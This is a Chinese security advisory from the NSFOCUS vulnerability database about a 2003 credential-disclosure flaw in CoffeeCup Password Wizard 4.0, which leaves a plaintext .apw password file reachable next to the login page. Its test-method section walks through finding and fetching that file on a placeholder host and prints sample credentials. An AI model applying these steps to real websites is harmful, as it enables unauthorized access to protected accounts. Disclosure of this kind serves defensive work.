绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

CoffeeCup Software Password Wizard远程密码泄露漏洞

发布日期：2003-03-01
更新日期：2003-03-06

受影响系统：

CoffeeCup Software Password Wizard 4.0

描述：

BUGTRAQ  ID: 6995

CoffeeCup软件一款自动对页面建立密码保护的程序，建立后如果用户输入验证信息正确就转到指定的页面，否则就会重定向其他警告URL。

CoffeeCup不充分保护用户名和密码信息，远程攻击者可以利用这个漏洞通过查看源代码获得敏感验证信息。

由于CoffeeCup设计问题，通过查看登录页面源代码可获得用户名和密码等敏感信息。如连接到登录页面，获得用于登录的.swf文件，并查看其源代码，如：

进入下面的页面：

https://www.victim.com/billing/

然后查看源代码：

[...]
        ID=billing WIDTH=146 HEIGHT=125>
        <PARAM NAME=movie VALUE="billing.swf">
        <PARAM NAME=quality VALUE=high>
[...]

(https://www.victim.com/billing/billing.swf)

一般来说包含密码的文件名字与登录页面相同，但是其扩展名变为.apw，然后直接提交URL获得.apw文件：

https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password
Wizard File)

利用任何文本编辑工具可以查看此文件获得用户名及密码信息，利用这些信息可以对保护系统进行攻击。

<*来源：Rynho Zeros Web （hackargentino@gmx.net）

  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104664150008834&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Rynho Zeros Web （hackargentino@gmx.net）提供了如下测试方法：

访问https://www.victim.com/billing/后，

查看源代码，如：

[...]
        ID=billing WIDTH=146 HEIGHT=125>
        <PARAM NAME=movie VALUE="billing.swf">
        <PARAM NAME=quality VALUE=high>
[...]

(https://www.victim.com/billing/billing.swf)

然后直接访问以.apw结尾的文件：

https://www.victim.com/billing/billing.apw

利用文本编辑器查看文件获得类似的信息如下：

--------- billing.apw -----------

COFFEECUP PASSWORD WIZARD FILE
WWW.COFFEECUP.COM
PLEASE DO NOT EDIT!!!!

MOVIE WIDTH:120
MOVIE HEIGHT:100
MOVIE FRAME RATE:0
MOVIE BK COLOR:$00ECECEC
MOVIE DEFAULT URL:
MOVIE DEFAULT FRAME:
MOVIE SWF NAME:billing.swf
MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
Webs\victim.com\new website project\billingMOVIE FONT NAME:MS Sans Serif
MOVIE FONT SIZE:8
MOVIE FONT COLOR:clBlack
MOVIE TRANSPARENT TRUE
MOVIE VERTICAL TRUE

USER BOX LEFT:2
USER BOX TOP:1
USER BOX WIDTH:116
USER BOX HEIGHT:34
USER BOX CAPTION:Username

PASS BOX LEFT:2
PASS BOX TOP:36
PASS BOX WIDTH:116
PASS BOX HEIGHT:34
PASS BOX CAPTION:Password

BUTTON LEFT:15
BUTTON TOP:78
BUTTON WIDTH:90
BUTTON HEIGHT:20
BUTTON PATH:
BUTTON TX:1
BUTTON TY:1

ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
[...]
END

--------- billing.apw -----------

建议：

厂商补丁：

CoffeeCup Software
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.coffeecup.com/java-password/

浏览次数：3179
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客